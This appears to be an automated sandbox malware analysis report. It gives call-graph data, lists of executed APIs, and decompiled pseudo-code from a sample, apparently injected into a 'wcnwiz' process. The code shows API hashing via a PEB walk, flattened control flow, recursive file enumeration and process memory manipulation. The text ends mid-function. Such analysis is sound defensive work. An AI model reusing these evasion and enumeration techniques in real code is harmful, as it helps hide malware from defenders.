6753 3b4ff9 6752->6753 6754 3b500f 6752->6754 6755 3b3f00 GetPEB 6753->6755 6754->6739 6756 3b5003 6755->6756 6757 3b3e60 GetPEB 6756->6757 6757->6754 6762 3b49c0 6758->6762 6759 3b49ea 6759->6686 6760 3b4b37 6760->6759 6763 3b3f00 GetPEB 6760->6763 6761 3b3f00 GetPEB 6761->6762 6762->6759 6762->6760 6762->6761 6765 3b34c0 GetPEB 6762->6765 6767 3b3e60 GetPEB 6762->6767 6764 3b4b4a 6763->6764 6766 3b3e60 GetPEB 6764->6766 6765->6762 6766->6759 6767->6762 6776 3b4870 6768->6776 6769 3b496e 6771 3b3f00 GetPEB 6769->6771 6772 3b492c 6769->6772 6770 3b3f00 GetPEB 6770->6776 6773 3b4981 6771->6773 6772->6686 6774 3b3e60 GetPEB 6773->6774 6774->6772 6775 3b3e60 GetPEB 6775->6776 6776->6769 6776->6770 6776->6772 6776->6775 6778 3b450e 6777->6778 6779 3b4384 6777->6779 6778->6696 6779->6778 6780 3b3f00 GetPEB 6779->6780 6783 3b43d6 6779->6783 6781 3b43ca 6780->6781 6782 3b3e60 GetPEB 6781->6782 6782->6783 6784 3b3f00 GetPEB 6783->6784 6791 3b4436 6783->6791 6796 3b44f4 6783->6796 6785 3b442a 6784->6785 6786 3b3e60 GetPEB 6785->6786 6786->6791 6787 3b44ba 6797 3b4550 6787->6797 6789 3b3f00 GetPEB 6789->6791 6791->6787 6791->6789 6792 3b3e60 GetPEB 6791->6792 6792->6791 6793 3b3f00 GetPEB 6794 3b44e8 6793->6794 6795 3b3e60 GetPEB 6794->6795 6795->6796 6796->6696 6799 3b44d0 6797->6799 6801 3b456b 6797->6801 6798 3b3e60 GetPEB 6798->6801 6799->6793 6799->6796 6800 3b3f00 GetPEB 6800->6801 6801->6798 6801->6799 6801->6800 6803 3b55c6 6802->6803 6804 3b55e8 6803->6804 6805 3b3f00 GetPEB 6803->6805 6806 3b56a8 6803->6806 6810 3b3e60 GetPEB 6803->6810 6804->6236 6805->6803 6806->6804 6807 3b3f00 GetPEB 6806->6807 6808 3b56bb 6807->6808 6809 3b3e60 GetPEB 6808->6809 6809->6804 6810->6803 6819 3b4ca0 6811->6819 6812 3b3f00 GetPEB 6812->6819 6813 3b4db4 6814 3b4d7c 6813->6814 6815 3b3f00 GetPEB 6813->6815 6814->6236 6817 3b4dc7 6815->6817 6816 3b3e60 GetPEB 6816->6819 6818 3b3e60 GetPEB 6817->6818 6818->6814 6819->6812 6819->6813 6819->6814 6819->6816 6821 3b46d7 6820->6821 6827 3b46ed 6820->6827 6822 3b3f00 GetPEB 6821->6822 6823 3b46e1 6822->6823 6825 3b3e60 GetPEB 6823->6825 6824 3b4760 6824->6240 6825->6827 6826 3b4721 6831 3b4752 6826->6831 6832 3b3f00 GetPEB 6826->6832 6827->6824 6827->6826 6828 3b3f00 GetPEB 6827->6828 6829 3b4715 6828->6829 6830 3b3e60 GetPEB 6829->6830 6830->6826 6831->6240 6833 3b4746 6832->6833 6834 3b3e60 GetPEB 6833->6834 6834->6831 6847 3b25f0 6835->6847 6836 3b2937 6844 3b295f 6836->6844 6846 3b3f00 GetPEB 6836->6846 6837 3b2912 6837->6836 6838 3b3f00 GetPEB 6837->6838 6842 3b292b 6838->6842 6839 3b42c0 GetPEB 6839->6847 6840 3b3f00 GetPEB 6840->6847 6841 3b2771 6841->6268 6843 3b3e60 GetPEB 6842->6843 6843->6836 6844->6268 6845 3b3e60 GetPEB 6845->6847 6848 3b2953 6846->6848 6847->6837 6847->6839 6847->6840 6847->6841 6847->6845 6849 3b3e60 GetPEB 6848->6849 6849->6844 6855 3b1010 6850->6855 6851 3b1105 6853 3b103a 6851->6853 6854 3b3f00 GetPEB 6851->6854 6852 3b3f00 GetPEB 6852->6855 6853->6294 6856 3b1118 6854->6856 6855->6851 6855->6852 6855->6853 6857 3b3e60 GetPEB 6855->6857 6858 3b3e60 GetPEB 6856->6858 6857->6855 6858->6853 6860 3b34c0 GetPEB 6859->6860 6861 3b36c4 6860->6861 6862 3b36e5 6861->6862 6863 3b3f00 GetPEB 6861->6863 6865 3b371a 6862->6865 6867 3b3f00 GetPEB 6862->6867 6864 3b36d9 6863->6864 6866 3b3e60 GetPEB 6864->6866 6870 3b3742 6865->6870 6871 3b3f00 GetPEB 6865->6871 6866->6862 6868 3b370e 6867->6868 6869 3b3e60 GetPEB 6868->6869 6869->6865 6874 3b3f00 GetPEB 6870->6874 6876 3b376e 6870->6876 6872 3b3736 6871->6872 6873 3b3e60 GetPEB 6872->6873 6873->6870 6875 3b3762 6874->6875 6877 3b3e60 GetPEB 6875->6877 6876->6070 6877->6876 6880 3b7712 6878->6880 6879 3b34c0 GetPEB 6879->6880 6880->6879 6881 3b77b3 6880->6881 6882 3b3f00 GetPEB 6880->6882 6883 3b78a3 6880->6883 6885 3b3e60 GetPEB 6880->6885 6884 3b3f00 GetPEB 6881->6884 6888 3b77d2 6881->6888 6882->6880 6883->6384 6886 3b77c6 6884->6886 6885->6880 6887 3b3e60 GetPEB 6886->6887 6887->6888 6888->6384 7118 3b9b60 7126 3b9b80 7118->7126 7119 3b9d96 7121 3b9d12 7119->7121 7122 3b3f00 GetPEB 7119->7122 7120 3b9dd0 GetPEB 7120->7126 7123 3b9da9 7122->7123 7124 3b3e60 GetPEB 7123->7124 7124->7121 7125 3b3f00 GetPEB 7125->7126 7126->7119 7126->7120 7126->7121 7126->7125 7127 3b3e60 GetPEB 7126->7127 7127->7126 7128 3b47e0 7129 3b4c80 GetPEB 7128->7129 7130 3b47f5 7129->7130 6978 3ba198 6986 3ba189 6978->6986 6979 3ba439 6980 3bacd0 GetPEB 6980->6986 6981 3ba552 6984 3b3f00 GetPEB 6981->6984 6988 3ba571 6981->6988 6982 3b1150 GetPEB 6982->6986 6983 3b34c0 GetPEB 6983->6986 6987 3ba565 6984->6987 6985 3b4220 GetPEB 6985->6986 6986->6979 6986->6980 6986->6981 6986->6982 6986->6983 6986->6985 6989 3b4b70 2 API calls 6986->6989 6991 3bb520 GetPEB 6986->6991 6993 3b3f00 GetPEB 6986->6993 6996 3b3460 GetPEB 6986->6996 6998 3b3e60 GetPEB 6986->6998 6990 3b3e60 GetPEB 6987->6990 6992 3ba599 6988->6992 6994 3b3f00 GetPEB 6988->6994 6989->6986 6990->6988 6991->6986 6993->6986 6995 3ba58d 6994->6995 6997 3b3e60 GetPEB 6995->6997 6996->6986 6997->6992 6998->6986 7137 3b1fd8 7144 3b1fd2 7137->7144 7138 3b2212 7139 3b2208 7138->7139 7141 3b4220 GetPEB 7138->7141 7140 3b42c0 GetPEB 7140->7144 7141->7139 7142 3b3f00 GetPEB 7142->7144 7143 3b3e60 GetPEB 7143->7144 7144->7138 7144->7139 7144->7140 7144->7142 7144->7143 6999 3bb110 7000 3bb124 6999->7000 7001 3b6060 GetPEB 7000->7001 7012 3bb1aa 7000->7012 7002 3bb136 7001->7002 7003 3b3310 GetPEB 7002->7003 7004 3bb14c 7003->7004 7005 3bb182 7004->7005 7006 3b3f00 GetPEB 7004->7006 7009 3b3f00 GetPEB 7005->7009 7005->7012 7007 3bb176 7006->7007 7008 3b3e60 GetPEB 7007->7008 7008->7005 7010 3bb19e 7009->7010 7011 3b3e60 GetPEB 7010->7011 7011->7012 7013 3b6208 7022 3b6202 7013->7022 7014 3b42c0 GetPEB 7014->7022 7015 3b624b 7016 3b55b0 GetPEB 7016->7022 7017 3b4c80 GetPEB 7017->7022 7018 3b6490 7019 3b3f00 GetPEB 7019->7022 7020 3b3e60 GetPEB 7020->7022 7021 3b3f00 GetPEB 7023 3b642d 7021->7023 7022->7014 7022->7015 7022->7016 7022->7017 7022->7019 7022->7020 7022->7023 7023->7018 7023->7021 7024 3b3e60 GetPEB 7023->7024 7024->7023 7025 3b6608 7067 3b65fd 7025->7067 7026 3b94d0 GetPEB 7026->7067 7027 3b68df 7028 3b6dcd 7036 3bb2e0 GetPEB 7028->7036 7029 3b7410 GetPEB 7029->7067 7030 3b8bb0 2 API calls 7030->7067 7031 3b706e 7035 3b8740 3 API calls 7031->7035 7032 3b9f30 GetPEB 7032->7067 7033 3b9050 GetPEB 7033->7067 7034 3bb1d0 GetPEB 7034->7067 7042 3b7073 7035->7042 7036->7027 7037 3b7061 7040 3b8d40 2 API calls 7037->7040 7038 3b72d0 GetPEB 7038->7067 7039 3b9860 6 API calls 7039->7067 7050 3b7066 7040->7050 7041 3b61e0 GetPEB 7041->7067 7043 3b80a0 2 API calls 7043->7067 7044 3b53d0 GetPEB 7044->7067 7045 3b6f27 GetTickCount 7045->7067 7046 3b9270 GetPEB 7046->7067 7047 3b7120 3 API calls 7047->7067 7048 3b8700 GetPEB 7048->7067 7049 3b3f00 GetPEB 7049->7067 7051 3b4770 2 API calls 7051->7067 7052 3b3310 GetPEB 7052->7067 7053 3b4220 GetPEB 7053->7067 7054 3b3e60 GetPEB 7054->7067 7055 3b12b0 2 API calls 7055->7067 7056 3bb430 3 API calls 7056->7067 7057 3b8970 2 API calls 7057->7067 7058 3b8e80 2 API calls 7058->7067 7059 3b6060 GetPEB 7059->7067 7060 3b8400 2 API calls 7060->7067 7061 3b6975 GetTickCount 7061->7067 7062 3b1840 GetPEB 7062->7067 7063 3b9620 2 API calls 7063->7067 7064 3bafe0 GetPEB 7064->7067 7065 3b3460 GetPEB 7065->7067 7066 3b4160 GetPEB 7066->7067 7067->7026 7067->7027 7067->7028 7067->7029 7067->7030 7067->7031 7067->7032 7067->7033 7067->7034 7067->7037 7067->7038 7067->7039 7067->7041 7067->7043 7067->7044 7067->7045 7067->7046 7067->7047 7067->7048 7067->7049 7067->7051 7067->7052 7067->7053 7067->7054 7067->7055 7067->7056 7067->7057 7067->7058 7067->7059 7067->7060 7067->7061 7067->7062 7067->7063 7067->7064 7067->7065 7067->7066 5969 3b3780 5970 3b37ab 5969->5970 5971 3b3795 5969->5971 5974 3b37dd 5970->5974 5976 3b3f00 GetPEB 5970->5976 5972 3b3f00 GetPEB 5971->5972 5973 3b379f 5972->5973 5975 3b3e60 GetPEB 5973->5975 5979 3b3812 5974->5979 5980 3b3f00 GetPEB 5974->5980 5975->5970 5977 3b37d1 5976->5977 5978 3b3e60 GetPEB 5977->5978 5978->5974 5982 3b384a 5979->5982 5984 3b3f00 GetPEB 5979->5984 5981 3b3806 5980->5981 5983 3b3e60 GetPEB 5981->5983 5987 3b3876 5982->5987 5988 3b3f00 GetPEB 5982->5988 5983->5979 5985 3b383e 5984->5985 5986 3b3e60 GetPEB 5985->5986 5986->5982 5990 3b38d1 SHFileOperationW 5987->5990 5992 3b3f00 GetPEB 5987->5992 5989 3b386a 5988->5989 5991 3b3e60 GetPEB 5989->5991 5991->5987 5993 3b38c0 5992->5993 5994 3b3e60 GetPEB 5993->5994 5995 3b38cc 5994->5995 5995->5990 7080 3b2b80 7081 3b2b99 7080->7081 7082 3b2baf 7080->7082 7083 3b3f00 GetPEB 7081->7083 7084 3b2ba3 7083->7084 7085 3b3e60 GetPEB 7084->7085 7085->7082 7145 3b7e40 7151 3b7e50 7145->7151 7146 3b7f83 7148 3b38f0 2 API calls 7146->7148 7147 3b7f7a 7149 3b7f96 7148->7149 7150 3b34c0 GetPEB 7150->7151 7151->7146 7151->7147 7151->7150 7152 3b3f00 GetPEB 7151->7152 7153 3b3e60 GetPEB 7151->7153 7152->7151 7153->7151

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 003A0448
                                                          • Part of subcall function 003A1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003A0EFD,00000000), ref: 003A1155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 003A0463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003A0484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 003A048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 003A0492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 003A049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 003A04A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 003A04B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 003A04E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 003A04F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 003A0519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 003A0530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 003A0547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 003A0562
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265812164.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3a0000_wcnwiz.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 7fc2cabb5005219e476cccc1626e0b5ba87bf63192eb78d5262592d200b210f3
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: 82416EB59043406EE715EB62C846F6FB3EDEFCA740F008D1CB7449B241DA74D9048BA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 447 3b38f0-3b390b 448 3b3910-3b3915 447->448 449 3b391b 448->449 450 3b3a69-3b3a6e 448->450 453 3b3a5f-3b3a64 449->453 454 3b3921-3b3926 449->454 451 3b3acc-3b3adf call 3b34c0 450->451 452 3b3a70-3b3a75 450->452 468 3b3afc-3b3b17 451->468 469 3b3ae1-3b3af7 call 3b3f00 call 3b3e60 451->469 455 3b3a77-3b3a7e 452->455 456 3b3ab6-3b3abb 452->456 453->448 457 3b392c-3b3931 454->457 458 3b3a17-3b3a1e 454->458 461 3b3a9b-3b3ab1 455->461 462 3b3a80-3b3a96 call 3b3f00 call 3b3e60 455->462 456->448 465 3b3ac1-3b3acb 456->465 466 3b3b70-3b3b77 457->466 467 3b3937-3b393c 457->467 463 3b3a3b-3b3a4f FindFirstFileW 458->463 464 3b3a20-3b3a36 call 3b3f00 call 3b3e60 458->464 461->448 462->461 474 3b3b97-3b3ba1 463->474 475 3b3a55-3b3a5a 463->475 464->463 472 3b3b79-3b3b8f call 3b3f00 call 3b3e60 466->472 473 3b3b94 466->473 467->456 476 3b3942-3b3947 467->476 497 3b3b19-3b3b2f call 3b3f00 call 3b3e60 468->497 498 3b3b34-3b3b3f 468->498 469->468 472->473 473->474 475->448 477 3b394d-3b3953 476->477 478 3b39f1-3b3a12 476->478 484 3b3955-3b395d 477->484 485 3b3974-3b3976 477->485 478->448 491 3b395f-3b3963 484->491 492 3b396d-3b3972 484->492 485->492 494 3b3978-3b398b call 3b34c0 485->494 491->485 501 3b3965-3b396b 491->501 492->448 511 3b39a8-3b39ec call 3b38f0 call 3b3460 494->511 512 3b398d-3b39a3 call 3b3f00 call 3b3e60 494->512 497->498 509 3b3b5c-3b3b6b 498->509 510 3b3b41-3b3b57 call 3b3f00 call 3b3e60 498->510 501->485 501->492 509->448 510->509 511->448 512->511
                                                        C-Code - Quality: 63%
                                                        			E003B38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x3be430 == 0) {
                                                        								 *0x3be430 = E003B3E60(_t56, E003B3F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x3bdba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E003B3E60(_t56, E003B3F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x3bdba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E003B34C0(0x3bd290);
                                                        											_t50 =  *0x3be158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E003B3E60(_t56, E003B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x3be158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E003B38F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E003B3460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E003B34C0(0x3bd260);
                                                        					_t24 =  *0x3be158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E003B3E60(_t56, E003B3F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x3be158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x3be494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E003B3E60(_t56, E003B3F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x3be494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x3bdf30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E003B3E60(_t56, E003B3F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x3bdf30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
                                                        					_t22 = 0x8a099c9;
                                                        					goto L1;
                                                        				} else {
                                                        					if(_t22 != 0x36cb81de) {
                                                        						goto L27;
                                                        					} else {
                                                        						_t33 =  *0x3bdf88;
                                                        						if(_t33 == 0) {
                                                        							_t33 = E003B3E60(_t56, E003B3F00(0x9bab0b12), 0xa53a5b1a, _t95);
                                                        							 *0x3bdf88 = _t33;
                                                        						}
                                                        						_t34 =  *_t33(_t56,  &_v1636);
                                                        						asm("sbb eax, eax");
                                                        						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
                                                        						goto L1;
                                                        					}
                                                        				}
                                                        				goto L40;
                                                        			}































                                                        0x003b38fa
                                                        0x003b38fc
                                                        0x003b38fe
                                                        0x003b3902
                                                        0x003b3907
                                                        0x003b3910
                                                        0x003b3910
                                                        0x003b3910
                                                        0x003b3915
                                                        0x00000000
                                                        0x00000000
                                                        0x003b391b
                                                        0x003b3a5f
                                                        0x00000000
                                                        0x003b3921
                                                        0x003b3926
                                                        0x003b3a1e
                                                        0x003b3a36
                                                        0x003b3a36
                                                        0x003b3a48
                                                        0x003b3a4a
                                                        0x003b3a4f
                                                        0x003b3ba1
                                                        0x003b3a55
                                                        0x003b3a55
                                                        0x00000000
                                                        0x003b3a55
                                                        0x003b392c
                                                        0x003b3931
                                                        0x003b3b70
                                                        0x003b3b77
                                                        0x003b3b8a
                                                        0x003b3b8f
                                                        0x003b3b8f
                                                        0x00000000
                                                        0x003b3b95
                                                        0x003b393c
                                                        0x003b3ab6
                                                        0x003b3abb
                                                        0x00000000
                                                        0x003b3acb
                                                        0x003b3acb
                                                        0x003b3acb
                                                        0x003b3942
                                                        0x003b3947
                                                        0x003b39fd
                                                        0x003b3a06
                                                        0x003b3a0d
                                                        0x003b394d
                                                        0x003b3953
                                                        0x003b3974
                                                        0x003b3976
                                                        0x00000000
                                                        0x003b3978
                                                        0x003b3982
                                                        0x003b3984
                                                        0x003b398b
                                                        0x003b399e
                                                        0x003b39a3
                                                        0x003b39a3
                                                        0x003b39bc
                                                        0x003b39d8
                                                        0x003b39dd
                                                        0x003b39e2
                                                        0x003b39e7
                                                        0x003b39e7
                                                        0x003b3955
                                                        0x003b3955
                                                        0x003b395d
                                                        0x003b396d
                                                        0x003b396d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003b395d
                                                        0x003b3953
                                                        0x00000000
                                                        0x003b3947
                                                        0x003b393c
                                                        0x003b3926
                                                        0x00000000
                                                        0x003b391b
                                                        0x003b3a6e
                                                        0x003b3ad6
                                                        0x003b3ad8
                                                        0x003b3adf
                                                        0x003b3af2
                                                        0x003b3af7
                                                        0x003b3af7
                                                        0x003b3b0b
                                                        0x003b3b0d
                                                        0x003b3b12
                                                        0x003b3b17
                                                        0x003b3b2a
                                                        0x003b3b2f
                                                        0x003b3b2f
                                                        0x003b3b36
                                                        0x003b3b38
                                                        0x003b3b3f
                                                        0x003b3b52
                                                        0x003b3b57
                                                        0x003b3b57
                                                        0x003b3b60
                                                        0x003b3b62
                                                        0x003b3b66
                                                        0x00000000
                                                        0x003b3a70
                                                        0x003b3a75
                                                        0x00000000
                                                        0x003b3a77
                                                        0x003b3a77
                                                        0x003b3a7e
                                                        0x003b3a91
                                                        0x003b3a96
                                                        0x003b3a96
                                                        0x003b3aa1
                                                        0x003b3aa5
                                                        0x003b3aac
                                                        0x00000000
                                                        0x003b3aac
                                                        0x003b3a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 003B3A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2265821061.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                                        • Associated: 00000009.00000002.2265816784.00000000003B0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265828788.00000000003BD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000009.00000002.2265833373.00000000003BF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3b0000_wcnwiz.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 103e484396fd65ac63f8f08efa272f7ca83d22bfa970ad6610196ca44cfa7807
                                                        • Instruction ID: c1d6fafe324a82ef9fb10308a5b8475273649f8efeb02baeea4b461f5b5bf08a
                                                        • Opcode Fuzzy Hash: 103e484396fd65ac63f8f08efa272f7ca83d22bfa970ad6610196ca44cfa7807
                                                        • Instruction Fuzzy Hash: F451F5317042214BCB26EB6898557FB37AA9B9070CF110A2AF756CBB91EF75CF054392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 61%
                                                        			E003B5040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x3be494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x3be494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x3bdd18;
                                                        								if( *0x3bdd18 == 0) {
                                                        									 *0x3bdd18 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x3be484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E003B3E60(_t58, E003B3F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x3be484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x3be18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E003B3E60(_t58, E003B3F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x3be18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x3be29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E003B3E60(_t58, E003B3F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x3be29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x3bde08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E003B3E60(_t58, E003B3F00(0x9bab0b12), 0xd8ef4c49, _t112);
